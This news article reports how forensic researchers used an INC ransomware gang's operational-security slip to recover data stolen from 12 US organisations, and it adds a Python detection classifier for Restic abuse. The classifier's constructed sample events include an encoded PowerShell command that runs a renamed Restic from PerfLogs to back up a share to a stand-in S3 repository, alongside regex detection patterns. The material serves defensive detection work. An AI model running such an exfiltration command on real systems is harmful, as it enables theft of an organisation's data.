INC ransomware opsec fail allowed data recovery for 12 US orgs

Recorded: Jan. 22, 2026, 6:03 p.m.
By Bill Toulas

January 22, 2026
11:21 AM

An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen U.S. organizations.
A deep forensic examination of the artifacts left behind uncovered tooling that had not been used in the investigated attack, but that exposed attacker infrastructure storing data exfiltrated from multiple victims.
The operation was conducted by Cyber Centaurs, a digital forensics and incident response company that disclosed its success last November and has now shared the full details with BleepingComputer.

The Cyber Centaurs investigation began after a client U.S. organization detected ransomware encryption activity on a production SQL Server.
The payload, a RainINC ransomware variant, was executed from the PerfLogs directory, which is typically created by Windows. However, ransomware actors have begun to use it more frequently for staging.
The researchers also noticed the presence of artifacts from the legitimate backup tool Restic, although data exfiltration had occurred during the lateral movement stage and the threat actor had not used the utility in this attack.
This caused a shift in the researchers' investigation "from incident response to infrastructure analysis."
The traces that INC ransomware left behind included renamed binaries (like 'winupdate.exe'), PowerShell scripts to execute Restic, hardcoded repository configuration variables, and backup commands.
Restic-related remnants indicated that the threat actor was using the backup tool selectively as part of its operational toolkit.
One of the discovered PowerShell scripts, 'new.ps1', contained Base64-encoded commands for Restic and included hardcoded environment variables used to run the tool (access keys, repository paths, and S3 passwords for encrypted repositories).
"If INC routinely reused Restic-based infrastructure across campaigns, then the storage repositories referenced in attacker scripts were unlikely to be dismantled once a ransom event concluded," the researchers theorized.
"Instead, those repositories would likely persist as long-lived attacker-controlled assets, quietly retaining encrypted victim data well after negotiations ended or payments were made."
If this were the case, data stolen from other organizations could still be available in an encrypted form and could potentially be recovered from the backup server.
To validate this hypothesis, the team developed a controlled, non-destructive enumeration process that confirmed the presence of encrypted data stolen from 12 unrelated organizations in the healthcare, manufacturing, technology, and service sectors in the United States.
None of the organizations were Cyber Centaurs clients, and the incidents were unrelated, distinct ransomware events.

Stolen data located on INC Ransom's backup server (Source: Cyber Centaurs)
The researchers then decrypted the backups and preserved the copies while contacting law enforcement to help validate ownership and guide them through the proper procedure.
The Cyber Centaurs report lists multiple tools used in INC ransomware attacks, including, among others, cleanup tools, remote access software, and network scanners.

Other tools found in INC Ransom's exposed infrastructure (Source: Cyber Centaurs)
The researchers also created YARA and Sigma rules to help defenders detect the Restic backup tool or its renamed binaries in the environment or running from suspicious locations, which could signal a ransomware attack in development.
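As an added illustration of the detection logic described above (this is not Cyber Centaurs' YARA or Sigma rule set), the following Python classifier applies the same three heuristics to Sysmon Event ID 1-style process events: a binary whose PE metadata says restic.exe but whose file name does not, any process launched from PerfLogs, and Restic repository settings on the command line, including ones hidden in an encoded PowerShell command. The event format, sample events, bucket name and password are constructed for the example.

```python
"""Restic-abuse heuristics matching the behaviours above (added example, not Cyber
Centaurs' YARA/Sigma rules). Sysmon Event ID 1-style dicts; samples are constructed."""
import base64
import re
from pathlib import PureWindowsPath
STAGING_DIRS = {r"c:\perflogs"}  # staging directory the article calls out
# Restic env vars (RESTIC_REPOSITORY/RESTIC_PASSWORD) or an S3 repo passed via -r/--repo.
RESTIC_CMD = re.compile(r"RESTIC_(?:REPOSITORY|PASSWORD)\b|(?:^|\s)(?:-r|--repo)\s+s3:\S+", re.I)
ENC_PS = re.compile(r"-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand payload (Base64 of UTF-16LE); '' if none."""
    m = ENC_PS.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""

def classify(event):
    """Return the names of the rules an event triggers, in evaluation order."""
    hits = []
    image = PureWindowsPath(event.get("Image", ""))
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    if original == "restic.exe":  # Restic present at all (informational where it is used legitimately)
        hits.append("restic_binary_seen")
        if image.name.lower() != "restic.exe":  # PE metadata says restic, file name does not
            hits.append("renamed_restic_binary")
    if str(image.parent).lower() in STAGING_DIRS:  # anything launched from PerfLogs
        hits.append("exec_from_staging_dir")
    # Inspect the visible command line plus whatever an encoded PowerShell command hides.
    if RESTIC_CMD.search(cmd + " " + decode_encoded_command(cmd)):
        hits.append("restic_backup_cmdline")
    return hits

# Constructed samples: renamed Restic run from PerfLogs, an encoded PowerShell wrapper
# that sets Restic env vars, and a legitimately installed Restic listing snapshots.
_PAYLOAD = ("$env:RESTIC_REPOSITORY='s3:s3.example.invalid/bucket'; "
            "$env:RESTIC_PASSWORD='constructed'; C:\\PerfLogs\\winupdate.exe backup D:\\Shares")
SAMPLE_EVENTS = [
    {"Image": r"C:\PerfLogs\winupdate.exe", "OriginalFileName": "restic.exe",
     "CommandLine": r"winupdate.exe -r s3:s3.example.invalid/bucket backup D:\Shares"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")},
    {"Image": r"C:\Program Files\Restic\restic.exe", "OriginalFileName": "restic.exe",
     "CommandLine": "restic.exe snapshots"},
]
```

Running `classify` over `SAMPLE_EVENTS` flags the first two events and returns only the informational `restic_binary_seen` for the legitimate install, which is the tuning decision a team that uses Restic itself has to make.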
INC ransomware is a ransomware-as-a-service (RaaS) operation that emerged in mid-2023.
The threat actor claimed several high-profile victims over the years, including Yamaha Motor, Xerox Business Solution, Scotland's NHS, McLaren Health Care, the Texas State Bar, Ahold Delhaize, the Panama Ministry of Economy, the Pennsylvania AG Office, and Crisis24.

Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.